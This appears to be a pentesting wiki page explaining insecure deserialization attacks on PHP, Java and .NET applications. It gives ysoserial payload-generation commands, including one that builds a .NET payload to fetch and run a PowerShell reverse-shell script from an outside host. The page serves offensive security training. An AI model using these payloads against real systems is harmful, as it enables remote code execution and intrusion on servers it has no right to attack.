Physical attacks
Mobile Apps Pentesting
Pentesting

Deserialization

Serialization is the process of turning some object into a data format that can be restored later. People often serialize objects in order to save them to storage, or to send as part of communications.

Deserialization is the reverse of that process, taking data structured from some format, and rebuilding it into an object. Today, the most popular data format for serializing data is JSON. Before that, it was XML.

In many ocations you can find some code in the server side that unserialize some object given by the user. In this case, you can send a malicious payload to make the server side behave unexpectedly.

You should read: https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html for learn how to attack.

PHP

For example, in PHP any function of a class that starts with "__" will be executed when an object of that class is deserialized. So, setting some values for the attributes of that class could allow you to execute code.

You can read an explained PHP example here: https://www.notsosecure.com/remote-code-execution-via-php-unserialize/

Java

Basic vulns

If you find some parameter being sent to the server like:

javax.faces.ViewState=rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAJwdAAML2xvZ2luLnhodG1s

You could have found a vulnerable java application. Firgerprints of java serialized objects:

  • AC ED 00 05 in Hex

  • rO0 in Base64

  • Content-type header of an HTTP response set to application/x-java-serialized-object

You can exploit it using ysoserial. Download from the git the newest ysoserial.jar file and create a payload doing:

java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections5 'cmd /c ping -n 1 10.10.14.0'

Check for common-collections and "InvokerTransformer" inside the application files:

cd /pat/application
grep -R InvokerTransformer .

Why

Java LOVES sending serialized objects all over the place. For example:

  • In HTTP requests – Parameters, ViewState, Cookies, you name it.

  • RMI – The extensively used Java RMI protocol is 100% based on serialization

  • RMI over HTTP – Many Java thick client web apps use this – again 100% serialized objects

  • JMX – Again, relies on serialized objects being shot over the wire

  • Custom Protocols – Sending an receiving raw Java objects is the norm – which we’ll see in some of the exploits to come

More details

.Net

You could also exploit serialised objects in .Net.

To created the payloads you can use: https://github.com/pwntester/ysoserial.net This tool is a little bit different from Javas one because it can generate Payloads in Binary format (like java ysoserial), in XML and in JSON. For identifying binary format in Base64 you should look for the initial string: AAEAAAD/////

For example, you could create a payload in JSON to execute a PS reverse shell with:

ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "powershell \"IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9/powercat.ps1')\"" -t

Take a look to this POST about how to try to exploit the __ViewState parameter of .Net to execute arbitrary code.

More info about .Net deserialization on this paper: https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf